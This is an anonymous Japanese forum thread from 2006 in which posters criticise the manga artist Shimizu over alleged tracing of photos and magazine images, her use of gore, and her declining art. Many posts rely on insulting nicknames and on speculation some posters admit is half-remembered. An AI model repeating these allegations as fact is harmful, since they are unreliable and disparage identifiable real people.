476 :花と名無しさん:2006/10/12(木) 01:36:17 ID:???0
偶に沸くじゃん、必死そうなの。
あれ本人?

メロスレでも話題に出ないし、清水。


477 :花と名無しさん:2006/10/12(木) 02:01:48 ID:???O
トレース・パクは明白な事実だし、家具屋以降のグダグダもほぼ共通認識と呼べるレベルだと思うんだが、
汚水本人に関する批判のネタは、例の「服変えます発言」と「クレジット・参考文献の扱いの手抜&卑怯さ」「バレエとかの萌え・ミハ体質」ぐらいで
他は推測の域を出ない感じなんだよね。だから、納得できるような言い掛かりのようなビミョーなレスがループしてる気がする。


波ぐらい本人が発信してくれるネタが豊富だと、作品分析にも説得力が出て、ヲチしてて楽しいんだけどねw
良くも悪くも汚水が小物ってことだろうけど、その割に飽きずに居着いてる人が多いのか、このスレも良く続いてる方だよね…

478 :花と名無しさん:2006/10/12(木) 02:05:50 ID:???0
今後もパク止めそうにないので定点でヲチしてる。

特に自分はグロ系の美術作品好きなので。
そしてこの人ほどひどいパクリ肩する人あんまり見ないから。


シミズには全く興味は無い。
普通に面白くないマンガ家だな。と思ってる。


479 :花と名無しさん:2006/10/12(木) 03:02:04 ID:???0
>>477
十分クズだよ、シミズも。

並みはまた別路線だw


480 :花と名無しさん:2006/10/12(木) 08:19:26 ID:???0
んー、パクはパクで追究・断罪するべきだが、
作品語りの際に「どうせそれもパクリでそ」「信者ウザ」とかで
すべてをパクリの方向に持っていって口を封じさせる少数のアンチに辟易してる私は穏健派?
清水がパクラーであるなしに関わらず家具屋や秘密はつまらんのに、
パクだからということに目がくらんで作品の正当な評価ができないというかw
毎回ではないけど、大抵の話題が「パクだから」に集約するのはなんだかなあ。

ま、そう思われても仕方がない原因を作り、
今の作品に語るべきところがなにもない清水が悪いんだがな…

481 :花と名無しさん:2006/10/12(木) 08:45:42 ID:???0
>>480
家具屋とか秘密とか面白くないものが殆ど
          +
過去の美点を振り返るとパク多数


……ってだけじゃないの?
集約もなんも、過去に褒められてたところがパクだらけで判明てないものも
疑わしく思えてしまって


482 :花と名無しさん:2006/10/12(木) 17:16:46 ID:???0
パク話題アキタヨー
作品ガタリシヨウヨー








ムリダッタ…orz

483 :花と名無しさん:2006/10/12(木) 17:40:15 ID:???0
ラストシーンは必ず宇宙空間。ワンパターン。
記憶喪失も同じ。
ホモネタ、人を安易に殺す作風になったのも嫌だった。
紙っぺらみたいな命描いておいて、最後に何が人類だと思った。

家具屋の双子の楓だかは再生した後本当に女の子殺したの?

484 :花と名無しさん:2006/10/12(木) 19:14:54 ID:???0
あれは、その後ババーニン守が「本人はそう言ってるけどニュースになってない」ような
こと言ってなかった?コミックス売ったから未確認だけど。

たとえ妄想でも子供殺すとことか嫌だったなぁ。
「月の子」の大地震で犠牲になった子のニュースも嫌だった。
本当にあったことだけど、だからこそ、漫画のちょっとした残酷ネタみたいに扱うのがどうも…。
いまだに「こんな残酷シーン描けちゃう私ってすごくね?」臭がすごいよね。

485 :花と名無しさん:2006/10/12(木) 20:45:30 ID:???0
その「残酷・グロ描ける自分凄い」というのも推測だと思うんだけど、
他のどんな理由であんな風に軽々しくその手の事柄を扱っているのか、
理解できないんだよね。作品外の部分で特にためらいなく
語ってるし……シミズってどういう価値観持ってるんだろうなあ。

486 :花と名無しさん:2006/10/12(木) 22:18:28 ID:???0
シミズンの半分は興味本位でできています。

「秘密」2巻に掲載されてたエッセイ漫画で、ひきまくった。
猟奇的な事件は人の関心をひくと思うし、私もその手の本を読むこともある。
でも、犠牲者がしばられて…のシーンを漫画で再現することに意味があるとは
思えない。

487 :花と名無しさん:2006/10/12(木) 22:33:21 ID:???0
それを作品で昇華するほどの作家性も無いしな。

作家なのでエログロも根性据えてやってる分にはいいんだけど、結局
秘密でウリのシーンはパクだもんなあ。


488 :花と名無しさん:2006/10/12(木) 22:49:12 ID:???0
>486
>犠牲者がしばられて…のシーンで再現
私も引いたよ。
縛られて青ざめて涙を浮かべて震える少年に萌え…なのか?と。
そんで出産後「グロで後味が悪いのが大好きです」
とか赤ちゃん抱っこしながら(絵だけど)言ってるの見てさらにどん引き。

489 :花と名無しさん:2006/10/12(木) 23:18:24 ID:???O
あげ

490 :花と名無しさん:2006/10/13(金) 00:15:52 ID:???0
>>482
家具屋とか露骨すぎる秘密パクで引きつつも竜とかを褒めてる人も居た。
ところがあっちもタデマとかのキッツイパクが判明した。


あれまではパク話ばかりじゃあなあと偶に諌めてたんだけど、もう庇いよう
がなくなっちゃった……


491 :花と名無しさん:2006/10/13(金) 00:27:55 ID:???0
子供産んでから母の心情としてグロ系は控えめになるかと思ったら
そんな事言ってんの?神経疑うな。
嗅ぐやの後半ではエロも描きたそうで引いた。

492 :花と名無しさん:2006/10/13(金) 00:30:20 ID:???0
>犠牲者がしばられて…のシーンで再現

目的がわかんないからね……

まだ創作している物語の中ならともかく。



しかもヘタ(ry

493 :花と名無しさん:2006/10/13(金) 00:31:30 ID:???0
あ、>>488へのレスです。

494 :花と名無しさん:2006/10/13(金) 00:33:55 ID:???0
失礼、491が488へのレスです。

495 :花と名無しさん:2006/10/13(金) 01:59:39 ID:???0
私はグロも後味悪いのも好きだし(清水以上のグロ作家なんて山といる)
母親になったからって別に趣味や嗜好は変わるもんでもなく変えるべきもんでもないと思う。

清水が気持ち悪いのは、すべて 萌 え が原動力っぽいところなんだよ…

少年縛ったって子供殺したって創作の中でなら構わないけど、
なんのオチも必然性もない中途半端なのは勘弁して。
山岸さんあたりが淡々と描いたらめっちゃ怖そう…<後書きの少年

496 :花と名無しさん:2006/10/13(金) 02:18:39 ID:???0
ギシさんも後味悪いの多いけど、あちらはさすがにうまいよなー。
職人技ってか、読んだ後本気でヘコむw 
ま、清水とはタイプが違うし、それ以前にあんな大御所と比べちゃいかんけど。

497 :花と名無しさん:2006/10/13(金) 15:49:38 ID:???0
495の補足
>>母親になったからって趣味・嗜好は変わるわけでも変えるべきでもない

別に誰も変えろなんて言ってなかったね。ゴメン。
控え目にするべきでもない、ってことです。
ま、赤ちゃん抱っこしながらの絵でっていうので引くのは分かるけど。
母親になって急に今までのグロは何だったの?的な
穏やかなママンガとか描きだしたらもっと引くW

498 :花と名無しさん:2006/10/13(金) 16:12:09 ID:???0
ママンガでもかまわないんだけど、仕事として描く以上は素人の日記と同じレベルじゃ困るな。

499 :花と名無しさん:2006/10/13(金) 20:20:51 ID:???0
子供を産んでもグロがますます冴えるアテクシ萌え

みたいな空気にウヘァ・・・と感じた。

500 :花と名無しさん:2006/10/13(金) 20:22:10 ID:???0
グロ好きでも猟奇殺人好きでもいいが、作品として昇華できてないのが
ただの萌えのみと言われてしまうところなんだろうな。


501 :花と名無しさん:2006/10/14(土) 00:10:11 ID:???0
グロに関しては「萌え」以上に何か質の悪いものを感じるなあ。
厨2病っつーか……
変わったことやってる自分をすごいでしょうとひけらかしているよな。

グロに関しては本当に一つとして「創作」がないので。


502 :花と名無しさん:2006/10/14(土) 00:12:10 ID:???0
確かに「本で見たのをそのままコピペ」レベルだな。

503 :花と名無しさん:2006/10/14(土) 01:03:31 ID:???0
話の流れを捻じ曲げてまで自分の描きたいシーンを組み込む。しかもパクだらけ。
グロに限らずバレエ、社会派ネタ、アクションシーンなんかでも同じことやってるんだよね。
的を一つに絞れずにあれこれ食い散らかしてることでいっそう印象が悪くなってる。
漫画家人生を賭け、萌え尽きる程の情熱を感じられない以上、
自分を大きく見せるためのアイテムを集めてるだけ…と思われても仕方ないでしょこれは。

よっぽど「少女漫画の枠を越えた少女漫画家」と呼ばれたいんだろうな。
少女漫画という土俵を離れたところで勝負したら恐らく全く通用しないだろうに。
万一それを自覚した上でこんなポーズ取ってるんだったら、少女漫画読者をバカにしてるとしか思えないが。

504 :花と名無しさん:2006/10/14(土) 01:28:16 ID:???0
>>502
うん。

むしろいい画像を見て、「これ使おう!」ではめ込んでるんじゃないかと。
写真そのまんまだもん。


505 :花と名無しさん:2006/10/14(土) 02:15:57 ID:???0
パクリ作家だと知らなくて読んでいても
「なんか変だな」
と思った所は検証画像でパクリだった、と判明して
成る程だからここだけ浮いてるのか、と思ったもんな



506 :花と名無しさん:2006/10/14(土) 02:22:57 ID:???0
決めゴマの大ゴマで多用してるせいもあると思う。
パクリを。

うーんと前に別スレで「清水のマンガは大げさなのに白々しくて話に入れない」
みたいなことを言ってる人が居たけど、そういうのもあるのかもなー。
決めの部分でいきなり「他人のもの」が出ちゃってるっつーか。


507 :花と名無しさん:2006/10/14(土) 14:45:36 ID:???0
けれんみたっぷりの作品が上手い作家さん(特に男性作家)は
決めゴマが大きくても構図がおおげさでもちゃんと演出として成立してるけど、
シミズンのはそういうのと違うからね。

508 :花と名無しさん:2006/10/15(日) 14:26:37 ID:???0
検証サイト見て思ったけど
これほど明らかなのにどうして大きな問題にならないのだろう
以前、漫画家が戦艦か何かの写真を1枚模写しただけで
新聞沙汰になってた記憶があるが

509 :花と名無しさん:2006/10/15(日) 15:50:55 ID:???0
>>508
多分漫画家側の影響力の違い。
著作権の問題はパクリ側・パクラレ側・編集・出版社による。
シミズのパクリはやられた方が知らないんじゃないかなー。

510 :花と名無しさん:2006/10/15(日) 21:13:13 ID:???0
マンガ家同士じゃないせいが大きくないかな。

嫌な見方をすると突っ込まれにくいところを狙ってんだと思う。
スコペラとか、片方の写真集は作家さん亡くなられてるしな。


511 :花と名無しさん:2006/10/15(日) 21:25:44 ID:???0
>510
スコペラちゃうって〜
主旨は同意。

512 :花と名無しさん:2006/10/15(日) 21:57:09 ID:???0
>>510
漫画家同士でもスルーされてる例は山ほどあるから
「突っ込まれにくいところ」というのが大きいかもね。

513 :花と名無しさん:2006/10/15(日) 22:00:20 ID:???0
>>511
またやっちまったorz
写真集持ってるのに毎回だよw

>>512
特に画家さんとか写真家とか変な話「格上」は「女性」の「マンガ家」相手には
突っ込みにくいと前に他のスレで読んで何となくなるほどなーと思った。


514 :花と名無しさん:2006/10/15(日) 22:35:09 ID:???0
生暖かくスルーされてるのか。

でも一度ガツンと痛い目見た方がいいと思う。たいして凝った構図でもない写真パクって
指摘されたら「制服だけでも替えとけばよかったミャハ」って言ってるようじゃ、自分がしてることの
ひどさを理解してない気がするよ。
しかし痛い目見たらそのまま消えちゃいそうだね。パクと萌えをとったらあんまり残るとこないから。

515 :花と名無しさん:2006/10/15(日) 23:13:24 ID:???0
>>514
生温かくというか……すごく悔しいとかむかっ腹立っても、ことを大きくするほうが
問題になったり自分が損をするので堪えているような気も。
パクってパクラレた側に負担が大きいんだよね。
申告しなきゃいけないし、立証責任あるし。
そのうちパク関係は法律変わるらしいけど。

自分が清水を一番買っていたのは「線が均一」なところだったんだw
昔は珍しくて、ああいうヌルっとした均一な線。変わった絵を見るのが好きなので
それで購入してた……
でも今は絵の劣化酷すぎて気色悪いし、パクと線があってない。

更にパソ導入でああいう線が一気に古びて手垢ついて見えてきたので今後は
買わないだろうなあ。


516 :花と名無しさん:2006/10/16(月) 03:52:34 ID:???0
パクも勿論大問題だけど。
劣化がね……あんまりひどくて新規読者なんかついてない感じ。
だから大騒ぎにはならないまま消えていくんじゃないかと。

今はグロ見たきゃもっといいグロマンガあるしな。


517 :花と名無しさん:2006/10/16(月) 11:24:06 ID:???0
最近は線が太くて粗い気がする。月の子あたりの細めの線がよかったのに。
流行を追求した結果の線の変化にも見えないし。

変な耳や棒涙や四角口は永久不変のくせに、何で線だけ粗くなるんだyo

518 :花と名無しさん:2006/10/16(月) 11:25:41 ID:???0
大ゴマの決めゴマ(要するにパクリコマ)以外は手抜きが激しくなっている…

519 :花と名無しさん:2006/10/16(月) 15:35:16 ID:???0
ある意味、多くの人にとっては絵の美麗さが持ち味の作家だったのに、
その絵はパクリ三昧の上激しく劣化。
せめてストーリーくらい気合い入れろよと言いたいところだが、
近作になればなるほど破綻が多くご都合主義というかとってつけた主義というか。


520 :花と名無しさん:2006/10/16(月) 19:52:46 ID:???0
趣味に費やす時間を増やす為にペン入れ時間を短縮した、って以前言ってた希ガス
熟練ならいいんだが雑になっただけだ

521 :花と名無しさん:2006/10/16(月) 21:01:29 ID:???0
>>520
すごいアホな発言だな。

ヘタクソが。


522 :花と名無しさん:2006/10/16(月) 22:05:19 ID:???0
>520
なんだそりゃ。
マジでアホ違う?

523 :花と名無しさん:2006/10/16(月) 23:24:15 ID:???0
趣味ってなんだろ?

524 :花と名無しさん:2006/10/17(火) 00:04:16 ID:???0
シュノーケルとかああいうの?

趣味が何であれ本当にアホだな。


525 :花と名無しさん:2006/10/17(火) 00:13:09 ID:???0
つーか普通はそんなことわざわざ言わないって。
ぬけぬけと言っちゃうあたり
「短縮しても上手いでしょ」って放言してるみたいでむかつくわー。

526 :花と名無しさん:2006/10/17(火) 00:16:42 ID:???0
ここ、アシさんが上手いんだよなあ。

本人は生絵見ると割と線とか汚い……


527 :花と名無しさん:2006/10/17(火) 00:19:47 ID:???0
それともあれか?
「短縮してもお上手ですね!オサスガデス!」
とか言ってほしいのか?
厨2かよ。

528 :花と名無しさん:2006/10/17(火) 00:25:19 ID:???0
厨2だよなあ。

グロに夢中になって拘って顕示してるあたり。
40こえても厨2病



529 :花と名無しさん:2006/10/17(火) 01:24:32 ID:???0
若い内から先生先生と呼ばれ続けたから勘違いしちゃったんだよきっと
「アテクシマンセー!」って

…misakiテンテーみたいだね

530 :花と名無しさん:2006/10/17(火) 01:30:51 ID:???O
>>520って、何での発言?コミックスの柱とかでは読んだ覚えないんだが。
家具屋の後半以降だったら自分が飛ばし読みしてんのかな・・・・・

531 :520:2006/10/17(火) 01:45:45 ID:???0
FC会報

532 :520:2006/10/17(火) 01:57:10 ID:???0
あーごめん、ニュアンスが違ったかも
会報に載ったインタビューの「原稿作成所要時間は?」に
「以前は○日だったけど今はX日でその分スキューバとかに回せるようになった」
って答えてたんだ…多分(ウロ 
ただ、そんで雑なのかー、と当時思った

533 :花と名無しさん:2006/10/17(火) 03:43:18 ID:???0
つか、この流れに便乗して多少擁護的発言をしてみるが、
この人もともとペン入れにすんごい時間を費やしていたとは、
藤本由香里(かな?)の少女漫画作家インタビュー本か何かで読んだ。
手元にないのでなんだけど、絵にはこだわりがあって、
とくに初期は神経質なくらい時間かけて描いてたとかなんとか。
(例として100万ポンドの愛が出されてたような…ウロ)

520の発言は確かにハァ?だけど、532の発言であれば、
本来だったら「うまく時間のやりくりしてるのねー」くらいにしか思われないよね。
実際、趣味に打ち込んでても面白い漫画描く作家なんて大勢いるし。
ただ「だから雑になったのか」と思わしめてしまう清水の劣化が悪いわけで…。
ゲームや同人にかまけて原稿落とすような奴に比べればマシだけど、
趣味にいそしむヒマがあったら昔みたいに本業きばれや!と。ついでにパクんなや!と。

ダメだ、擁護にならんかった…。シミズン、ごめんねw

534 :花と名無しさん:2006/10/17(火) 08:43:15 ID:???0
たとえ原稿作成所要時間が半日で残りはスキューバ!でも、面白ければ読者としては無問題。
それを本人自らコメントしてても、面白ければ(ry

つかウロオボエの発言に対して叩いたり擁護したりしても始まらんでしょ。

535 :花と名無しさん:2006/10/17(火) 10:42:17 ID:???0
FC会報って今は無いっぽいけど、いつまであったん?

536 :花と名無しさん:2006/10/17(火) 20:02:51 ID:???O
>>534
同意。汚水の劣化が原因とはいえ、なんか妄想で叩いてるみたいな流れになりがちで、痛い。

ソース付きのネタ投下は大歓迎だけどww
しかし律義にFC会報取ってあるような奇特な人はもういないか・・・・・・

537 :花と名無しさん:2006/10/17(火) 21:38:44 ID:???0
うーん、>>536が一行目で言ってることには同意だけど
汚水って呼び方はどうなの?とか思ってしまう

清水とか清水さんとかシミズンは気にならないが
汚水とか泥水って呼び方はなんか…なぁ

538 :花と名無しさん:2006/10/17(火) 22:12:52 ID:???0
>>537
このスレでそんな良心的な意見が!!w
前スレくらいからROMってて、最初は自分も引いた<汚水・泥水

でもスレの空気と、特に批判も出ない様子を見て
「あー、これが当たり前になるぐらい、パクの衝撃は大きかったんだなー」と思った。


539 :花と名無しさん:2006/10/17(火) 22:54:50 ID:???0
しかしまあ擁護がどうこうに限らず、他の作家さんであってもあんまりしないほうが
いい発言なんじゃないかなーと思った。
趣味が大好き!はいいんだけど、仕事と引き比べたり仕事の時間をそっちに回せ
たみたいな発言はしない方がいいような。

パクで汚れて、劣化著しい人だと何言っても論外なんだが。


540 :花と名無しさん:2006/10/17(火) 23:46:27 ID:???0
>>538
呼び方については結構前から思ってたんだけど
パクについてヒートアップ(?)してる時は言いにくかったんだ
でも今は多少なりと落ち着いてるし、言ってみようかなあ…と

清水さんのパクとか姿勢には、無論もにょってるよ

541 :花と名無しさん:2006/10/18(水) 00:09:35 ID:???0
呼び方なんかどうでもいいなあ。

2ちゃんで酷いあだ名が付いても、それが本当に酷かったり私怨だったり、傍目にも
見苦しければ自然と治るものよ。
スルーしといた方がいい。


542 :花と名無しさん:2006/10/18(水) 00:24:49 ID:???0
トン(´・ω・`)
そうだね、気にしないでスルーしてみるよ

スレ汚しスマソ

543 :花と名無しさん:2006/10/18(水) 00:32:57 ID:???0
まあ、いまんとこ使ってる人の方が少ないと思うけどね <汚水やら泥水やら

最初に使いだした人が「アテクシ天才!スレに定着させる!」なんつって
ひとりで頑張ってんじゃないの。クソが。

↑…のような妄想叩きが一番もにょるんだよなw あ、清水に対してのね。
他スレで自分大好き漫画家を何人も見慣れてるせいか、
あんまり清水の発言にアテクシなところって感じないもんで。キャラ萌えは感じるけど。
ま、人それぞれか。自己完結。

544 :花と名無しさん:2006/10/18(水) 00:53:58 ID:???0
>>543
何言ってるのか分からんw


酷いパクで汚れきってるのに名前が 「 清 水 」 ってのは皮肉だなと思う。
それで汚水とかドロミズとか言われちゃうのでしょう。


545 :花と名無しさん:2006/10/18(水) 01:24:13 ID:???0
いや、そりゃそうなんだけどw

>>543は、

最初に、清水のことを汚水やら泥水やらとこのスレで皮肉った人は、
「アテクシのネーミングセンス天才!」と思っているに違いないプゲラ 

と根拠のない見苦しい妄想をわざとした上で、
>>525-529くらいまでの一連の、清水さんに対する
アテクシマンセー妄想がモニョるって言いたいんじゃないの?



546 :花と名無しさん:2006/10/18(水) 01:39:16 ID:???0
>>545
それでも分かりにくい。

それに>>526なんかはアテクシマンセーの話?


547 :花と名無しさん:2006/10/18(水) 02:16:51 ID:???0
wikiの清水さんのところも正直ひいた。
理由・根拠は書かずにパクリとだけ書くのってどうなんだろうって。
このスレ知ってる人ならいいけど、あそこは2ちゃんじゃないし。

548 :花と名無しさん:2006/10/18(水) 02:21:19 ID:???0
>>546
>>526については、ただ単にアンカー上の問題じゃね?
読解力ないの?

549 :花と名無しさん:2006/10/18(水) 03:17:01 ID:???0
>>548
つスルー


550 :花と名無しさん:2006/10/18(水) 03:18:22 ID:???0
>>548
読解力とか言いすぎだよ。545?
内容が違うレスまでアンカー括るのがおかしいんじゃない?
アテクシマンセーの話題じゃないのにまとめて挙げていれば突っ込まれるでしょ。

>>547
清水さんはもう他のところでもパクで名を挙げつつあるし、もしも問題があるなら
適宜修正が春のでは。
淘汰されてくでしょう、極端な意見は。


551 :花と名無しさん:2006/10/18(水) 04:15:00 ID:???0
Wikipediaは「みんなで作っていく」ものだからね
問題があれば修正される

但し、楽天社員がWikipedia上の都合の悪い記事を勝手に
削除して問題になったように(楽天側は謝罪している)
どういう修正をしたかの修正履歴は残るし、自分勝手な修正は
戻されるのでその辺は承知の上でどうぞ

552 :花と名無しさん:2006/10/18(水) 08:15:31 ID:???0
>>550
や、わざわざ突っ込むほどのことでもないけど、
アンカー上の問題で関係ない話題が括られることもよくあるだろ
読解力とか言ってるのは544のレスも含まれるのでは?
543や545がそんなにわかりにくい内容とも思わんが。

553 :花と名無しさん:2006/10/18(水) 10:11:21 ID:???0
>>552
つヌルー

554 :花と名無しさん:2006/10/18(水) 14:21:59 ID:???0
>>552
本人みたいに見えるよ。スルーすりゃいいじゃん。


555 :花と名無しさん:2006/10/18(水) 14:58:01 ID:???0
自分>>548だが
>>545でも>>552でもないので念の為

556 :花と名無しさん:2006/10/18(水) 21:07:31 ID:???0
流れ変わってるのにスマソ@>>520>>532
会報探してみた。
93年のインタビューを脳内で変換してしまってた模様。
清水先生ごめんなさい。
当時で下絵から完成に4〜5日(カラーは除く)。
その分ネームに時間が掛かるようになってしまったらしい…

557 :花と名無しさん:2006/10/18(水) 21:17:33 ID:???0
93年から10年後の家具屋ではネームもえらい適当になっているな。
まずパクリの決めゴマばーんと配置して、
あとは手抜きの小ゴマで画面埋め、大量のセリフでストーリーを進めるだけ。

558 :花と名無しさん:2006/10/18(水) 22:27:47 ID:???0
>>557
家具屋に関しては、決めゴマ=パクリが定説みたいになってるけど
検証画像の倉庫にある以外にも、過去スレとかでは沢山挙がってたの?

しかし家具屋の20巻〜あたり、久々に読み返したけどホンとセリフだらけだな・・・

559 :花と名無しさん:2006/10/18(水) 22:50:28 ID:???0
>>558
きめゴマじゃあないが、中国舞台のあたりは晶は殆どモデル画像の写しだった。

雑誌の画像なんで今じゃもう探せないんだよなあ。クヤシス。


560 :花と名無しさん:2006/10/18(水) 23:13:20 ID:???0
>>557
細かく語るのも面倒、という気持ちはわかるが
その手のざっくりまとめ過ぎの批判は両刃の剣。
つーかループしすぎて見飽きた。

ページとかエピソードを指定した方がレスもしやすいし
「妄想」とか言われずに盛り上がれるんじゃね?


561 :花と名無しさん:2006/10/18(水) 23:23:50 ID:???0
>>556 会報探し&訂正乙です

>>559
「妄想」とまで言う気はないが、やっぱ画像がないと何ともいえないんだよね。
たとえば、後半の襲撃シーンで
マトリックスをパクってるとかいう意見が過去スレででたことあると思うが、
個人的には、あれはパクではなく萌えだろうと思うし。
清水って、とくに家具屋あたりから、その時々の萌えがそのまま絵にでてたよね。
でも、「萌え→影響受ける」と「パク」には大きな開きがある。
めちゃくちゃ見苦しいとしても、萌えは犯罪ではないし、みたいな。

562 :花と名無しさん:2006/10/18(水) 23:30:20 ID:???0
家具屋の場合、決めゴマというよりは
表紙や扉まわりの止め絵(とでもいうの?)にパクが多いような。
「制服変えときゃ(ry」の前田姉妹とかブス猫抱いてるシンディ・クロフォードとか。
物語内で黒に近い判定されてるのってあったっけ?

563 :花と名無しさん:2006/10/18(水) 23:30:23 ID:???0
>>561
そうねえ。
しかしそうは言っても物が雑誌で、もう相当前だからなあ。
連載当時のELLE、supurあたりを見たら一発なんだけどなあ。
もどかしいわ。


私が言っているのは中国付近の晶がスカート履いている画像。
あの辺毎度全部数ヶ月前の雑誌そのまんまだったのよ。
それはデザインの問題じゃなく、ポーズ、構図含めて、
特に直ぐに思い出せるのが、ミニスカにネクタイしている画像で、晶が煽りに
なってる奴。
スカートの陰が太腿に映っているのをちょっと変わった感じに処理してあった
んだけど、それが写真画像マンマだったのね。
コントラスト強い画像で影が濃くて、それをそのまま。
「あー、これをそのまま写すために普段やらない処理をしたんだなー」と思って、
そのあたりから話の劣化も併せて嫌になって暫く読まなくなってた。

なかなか画像を出せないのが悔しいなあ。


564 :花と名無しさん:2006/10/18(水) 23:36:31 ID:???0
>>562へ自己レス
レス書いてから検証倉庫久々に覗いたら、
マギーさんとか晶の肖像とか思いっきり黒判定でしたね。
失礼しました。

565 :花と名無しさん:2006/10/18(水) 23:48:08 ID:???0
>>563
そのあたりって何年頃なんだろ。
00年くらいからだったら、シュプールはないけど、
エル、フィガロ、流通、装苑あたりならポツポツとある。実家に。
ただ……掘りだして全ページあさって見るほどの情熱はないw

モデル好き&雑誌好きで、ファッション誌見まくってたけど、
同時期に家具屋読んでてパクにまるで気づかなかった私の目はフシアナかw

566 :花と名無しさん:2006/10/18(水) 23:50:58 ID:???0
目トレスだし、顔が歪み過ぎてて気付かなくても仕方ないな。
00年あたりならもうキャラの描き分けも怪しかった頃じゃない?

567 :花と名無しさん:2006/10/19(木) 00:00:19 ID:???0
>563
>もどかしいわ。

そうなんだよねー。
「秘密」で大統領の娘が着ていたドレス、あれ随分前の確かエルメスのドレス。
南野陽子が着てたんだけど、すっごい素敵で、よく覚えてたから「秘密」見たときアレレ?と思った。
でも証明できないし、もどかしい。

568 :花と名無しさん:2006/10/19(木) 00:16:54 ID:???0
>>565
自分が買ってるのはELLE、figaro、supurあたりなんでその当たりかなと。
そっか、当時まだシュプールなかったのか。
あとはヴァンテーヌとかを当時買ってたんでその辺かなあ。

色身がきれいな写真をモノクロに引き写してたのでわかんなかったのかもよ。
でも本当にまんまだった。写真の効果をそのまま絵に写してた。
自分が欲しい服だったんでウヒャーとなったww

「月の子」あたりはモリハナエが多いんだよね。

それとタイトルを失念したけど、大金持ちの女の子と遊園地の話、あの子の
服も何かの引き写しだったんだよなあ。
あー……もどかしいー(T∀T)


569 :花と名無しさん:2006/10/19(木) 00:39:10 ID:???0
そーいや雑誌はポーズ毎にスクラップして参考にしてるっていってたな
TVの取材でもスクラップ集がちらっと映ってたし
でもまさか「まんま」だとは思ってなかったですよ

570 :565:2006/10/19(木) 00:39:39 ID:???0
>>568
ちゃうちゃう!シュプールは当時もあったよ。
カルバン・クラインやダナ・キャラン特集してた時に2〜3冊買ったくらいで、
私はほとんど持って「ないけど」っていう意味です。わかりにくくてスマソ。

ところで、デザイナーがついてる洋服の模写ってどこまでパクになるの?
たとえば、例として適切かわからないけど、
シャネルスーツを書いても誰もパクとは言わないよね?
NANAの作者のヴィヴィアン丸出しもパクになるの?
写真模写がパクになるのはよくわかるんだけど。
無知ですまん、教えてエライヒト。

571 :花と名無しさん:2006/10/19(木) 00:45:47 ID:???0
>>570
ああ、そういう意味か。
てっきり自分の記憶違いか、ああボケてきたなと思ったよw

デザインのパクは実はマンガのパクよりも摘発が合った場合簡単に
証明できるんで厳しいらしいよ。
特に宣伝として作ったものはいい写真家の「作品」になってるし。

でも上の方にあるように畑違いだとあまり訴訟まではいかないみたい。
パクラレた側にも面倒だろうしなあ。
悪質な場合は指摘が入ったり注意・勧告する、と聞いた。


572 :花と名無しさん:2006/10/19(木) 00:46:41 ID:???0
NANAのはこれはどっかのスレで読んだのでうろ覚えなんだけど、あんだけ
売れたし、許可を求めたんだがヴィヴィアン側は許可出してないらしい。
(まあ当たり前と言えばそうなんだけど…)


というわけで、あくまでも悪質じゃなきゃ暗黙の了解、でもやり過ぎたら摘発み
たいなグレー?

……なんか同人誌みたいだな、清水よww

573 :花と名無しさん:2006/10/19(木) 01:12:08 ID:???0
NANA映画化にあたり制作側がヴィヴィアンに「衣装協力しる!」と言ったが
ヴィヴィアンはすげなく拒否…だったらしいな
作者の伸びてた鼻がぽっきり折られた…と某人形板で聞いた記憶がある

スレチすまそ

574 :花と名無しさん:2006/10/19(木) 02:02:06 ID:???0
NANAのヴィヴィアンもそうだけど、
キャラの個性のわかりやすい描き方として、
ピンクハウスを着させたり(少女趣味の記号)、
ヴィトンのバッグ持たせたり(ブランド好きの記号)…ってのよくあるよね。
ナイキのスニーカーやアディのジャージなんかも。
ああいうのって、本来は許可とったりクレジット載せたりしなきゃいけないもんなの??
当たり前のようにまかり通ってるから、別に問題ないもんだと思ってたよw 勉強になった。

575 :花と名無しさん:2006/10/19(木) 02:17:17 ID:???0
>>574
よーく見てみ。
一部デザイン変更とかになってるのがほとんどで、なってないのは
編集のチェックミスで後から消したり書き換えられてるよ。
特にロゴと名前は。

ブランド側が公式に許可しない限りは駄目さ、やっちゃ。
当たり前のことだが、イメージ含めてのブランドだからなあ。
相乗効果で良くなるのなら許可出すだろうけど、とりあえず清水は
駄目だろ。
パクの前に小物だしエセグロだし。


576 :花と名無しさん:2006/10/19(木) 11:36:20 ID:???0
>575
うーん、法的には問題なのかも知れないけど、
そうやって大々的に市場に出回ってるものに関しては、
引用する作家の肩を持ちたくなるなあ。
編集、出版社が神経質になってるのも法的根拠云々より先に
訴訟になったら面倒だ、危ない橋は避けて通ろうという気持ちがあるはず。

何時だったかアメリカのニュース番組で、
「世界一有名なネズミ」のTシャツを着てた人が
街角インタビュウに応えてる画が放送されたとかで、
デズニーがその放送局を訴える構えを見せたりしてたな。
あれは結果どうなったんだっけ?自分は正直、デズニー氏ねよとオモタヨ。

577 :花と名無しさん:2006/10/19(木) 12:30:31 ID:???0
それがデズ二クオリティw
どこかの幼稚園が記念にプールの底にネズミーを描いたら
著作権法違反で消せと命令したおw

578 :花と名無しさん:2006/10/19(木) 12:52:33 ID:???O
>>576
前半は同意だけど最後の
>とりあえず清水は 駄目だろ。パクの前に小物だしエセグロだし。
は、2ch内や自分の意見=一般社会の評価って思い込んでる感じで痛いな。


小物かグロかの前に、NANAですら…なんだから、実際に相乗効果を期待されて許可貰ってる漫画家の方が
希少なんじゃないの?(無知だから実例があるかどうかも知らん)
中高生向けに付録をブランドとのコラボでってのは、どっかで見掛けた気もするが。


しかし、キャラや作品の設定の為の記号として『○○っぽい』服を描くのと、
色んな媒体から適当に気に入ったものを(改変でも、そのままでも)使うのとは
同じ『デザインの盗用』でも悪質さの種類が違う。(どっちが『より悪い』、とかって意味じゃなくね)

579 :花と名無しさん:2006/10/19(木) 14:47:56 ID:???0
マックやコカコーラ社は基本的にロゴですら使用を禁止してたりするけど
それでも使用許可の下りたマンガ家(こないだ銃刀法で掴まったO氏)に対して
使用許可の下りなかったマンガ家(少女漫画界から追放されたスラダンパクったS氏)がいる

どんな会社も
要はブランド名にプラスにならないなら許可はしないって事じゃね?

ヴィヴィアンとかのファッション系は、プラスになるならない以前に
「漫画ごときに…」というプライドがあるんだろうけど…

580 :花と名無しさん:2006/10/19(木) 15:42:33 ID:???0
>>とりあえず清水は 駄目だろ。パクの前に小物だしエセグロだし。
>は、2ch内や自分の意見=一般社会の評価って思い込んでる感じで痛いな。

清水は経歴の割りに名前が知られてないのでずーっと小物扱いなのでは。
実際他のマンガスレでも名前知られてないなあと思う。

そしてグロはちょっとでもブランド側はイメージ落ちるの嫌なら忌避するだろ。
パクもさ、リサーチの結果そういう話があると要調査、検討→やっぱやめとこになる。


